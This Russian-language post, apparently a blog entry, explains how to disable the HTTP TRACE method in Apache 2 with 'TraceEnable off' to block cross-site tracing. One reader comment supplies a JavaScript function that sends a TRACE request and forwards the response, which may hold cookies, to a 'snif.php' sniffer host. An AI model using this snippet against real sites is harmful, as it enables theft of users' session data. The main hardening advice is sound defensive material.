Запрет метода TRACE в протоколе HTTP Apache 2
Задача: запретить метода TRACE в протоколе HTTP. С помощью использования метода TRACE в протоколе HTTP возможно выполнение атаки межсайтовый скриптинг. http://www.cgisecurity.com/articles/xss-faq.shtml
Дано: Apache 2
Решение:
в httpd.conf установить директиву
TraceEnable off
5 Май 2006 в 08:30
как пользоваться таким методом? опишите пожалуйста подробно.
22 Июнь 2006 в 11:52
Например:
function sendTrace () {
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
xmlHttp.open("TRACE", "http://forum.web-hack.ru",false);
xmlHttp.send();
window.location=("http://host/snif/snif.php?q="+xmlHttp.responseText)
}
4 Октябрь 2011 в 06:56
а что делает пример?